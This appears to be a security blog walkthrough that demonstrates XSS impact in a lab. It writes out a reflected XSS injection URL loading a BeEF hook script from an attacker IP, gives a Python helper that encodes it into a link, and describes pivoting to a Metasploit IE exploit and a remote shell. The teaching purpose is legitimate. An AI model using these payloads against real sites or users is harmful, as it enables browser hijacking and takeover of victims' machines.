"$client, I found a vulnerability on your website. It's cross-site scripting (XSS)."

"So what, that is a basic JavaScript alert box."

"Yes, you are right, but it could be used to do much more than just an alert box."

"Such as...?"

If the above sounds at all familiar, I sympathize, and I am here to offer something you can use to demo the actual danger of an XSS vulnerability in a website. Sometimes it seems that people do not believe you when you say "This is a serious risk and should be fixed." XSS is one of those issues that is tough to explain well and even tougher to demonstrate the risk of.



Enter BeEF (the Browser Exploitation Framework). This handy little tool gives an attacker a perfect way to turn a "simple XSS alert box" into much, much more. BeEF "hooks" the victim's browser: it injects JavaScript into the current page, which allows more JavaScript to be loaded and turns the browser into the client in a client/server model. In this post I am only going to show a small part of BeEF's capabilities, but it should hopefully be enough to catch a client's eye and help them understand the real risk associated with XSS.

If you have never used BeEF, note that this is not a tutorial on getting it up and running. There are plenty of those out there, and I suggest you take a look at them and at some of the other great videos on this tool. This post assumes the reader is somewhat familiar with BeEF and how to use it.

We will use the following setup for this demo:

BackTrack 5 R3 VM running BeEF - Attacker

Windows 7 running IE 8 - Victim

OWASP Broken Web Apps VM running Google's Gruyere - Vulnerable web app

First we need to identify a valid XSS vulnerability within a web application. We will then need to start BeEF and hook a victim's browser by exploiting the page vulnerable to XSS. Either reflected or stored XSS will work. Here we will use reflected XSS.

After eyeballing the Gruyere application, we find a textbook XSS bug here: http://192.168.1.104/1424231391/snippets.gtl?uid=<injection point>
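To make clear why a parameter like `uid` is an injection point, here is a minimal sketch of the underlying mistake. It is not Gruyere's actual code: the function names and the HTML template are hypothetical, and it only assumes that the page echoes the parameter back into the response without escaping it.

```python
import html


def render_snippets_unsafe(uid: str) -> str:
    # Hypothetical handler: the parameter is reflected into the page as-is,
    # so any markup in it becomes part of the HTML the browser parses.
    return f"<h2>Snippets for {uid}</h2>"


def render_snippets_escaped(uid: str) -> str:
    # Same hypothetical handler, but the value is HTML-escaped first,
    # so the browser shows it as text instead of running it.
    return f"<h2>Snippets for {html.escape(uid)}</h2>"


payload = "<script>alert(1)</script>"
print(render_snippets_unsafe(payload))
print(render_snippets_escaped(payload))
```

In the first output the script tag survives intact, which is exactly the "basic alert box" from the conversation above. In the second it comes back as harmless text.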

Now that we have our valid reflected XSS, we need to start BeEF and then inject the BeEF hook (a JavaScript file) using a script tag. Once BeEF is started, it gives you the script source to use. The injection will look something like this:

http://192.168.1.104/1424231391/snippets.gtl?uid=<script src="http://192.168.1.107:3000/hook.js"></script>
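The URL above contains spaces, quotes and angle brackets, so when it is delivered as a link it usually needs to be percent-encoded. The sketch below shows one way to do that with Python's standard library. The constant and function names are my own, and the addresses are simply the lab addresses used in this post.

```python
from urllib.parse import parse_qs, quote, urlsplit

# Lab values taken from this post; adjust for your own test environment.
TARGET = "http://192.168.1.104/1424231391/snippets.gtl"
HOOK_TAG = '<script src="http://192.168.1.107:3000/hook.js"></script>'


def build_injection_url(target: str, payload: str) -> str:
    # Percent-encode every reserved character so the payload survives
    # being pasted into a link or an email.
    return f"{target}?uid={quote(payload, safe='')}"


url = build_injection_url(TARGET, HOOK_TAG)
print(url)

# Round trip: what the server sees after decoding the query string.
decoded = parse_qs(urlsplit(url).query)["uid"][0]
print(decoded == HOOK_TAG)
```

The round trip at the end confirms that the application still receives the original script tag once it decodes the query string.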

Awesome! Now we have the victim browser under our control. Let's check out its profile and maybe run a few scripts to enumerate the browser version.

Here we can see the browser information showing Internet Explorer version 8. We will make note of this for use later on.
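As a rough illustration of where a version number like this can come from, the sketch below pulls the IE major version out of a User-Agent string. This is only an assumption-laden simplification: BeEF does its own detection in JavaScript inside the hooked browser, and the helper name and sample string here are mine (the sample follows the usual format for IE 8 on Windows 7).

```python
import re
from typing import Optional

# Typical User-Agent format for IE 8 on Windows 7 (sample value for illustration).
IE8_WIN7_UA = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"


def ie_major_version(user_agent: str) -> Optional[int]:
    # Older Internet Explorer versions announce themselves as "MSIE <major>.<minor>".
    match = re.search(r"MSIE (\d+)\.", user_agent)
    return int(match.group(1)) if match else None


print(ie_major_version(IE8_WIN7_UA))
```

User-Agent strings are trivially spoofed, which is one reason to cross-check the result with a second fingerprinting method before picking an exploit.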

Here are a few of the commands we can send to the victim browser via JavaScript. The one we ran here was the Fingerprint Browser script, which reports Internet Explorer 7 or later, consistent with the IE 8 result we already noted.

Now that we have enumerated the browser, let's attempt to exploit it with an IE client-side browser exploit in Metasploit. For this example we will use the ms12_037_ie_colspan exploit. Once we have correctly configured Metasploit, let's redirect the victim browser to our malicious site using BeEF.

Here we enter the URL provided by Metasploit, then execute the command.

As a result, Metasploit has sent the payload, received a shell back, and successfully migrated to a new process so that the shell is not lost when the user closes the browser. We have successfully compromised the machine. This demonstrates the potential impact of an XSS vulnerability on a website. By leveraging the free tools BeEF and Metasploit, we were able to take control of the underlying operating system via a client-side exploit in the user's browser. This is only one example of the many things that can be done with BeEF.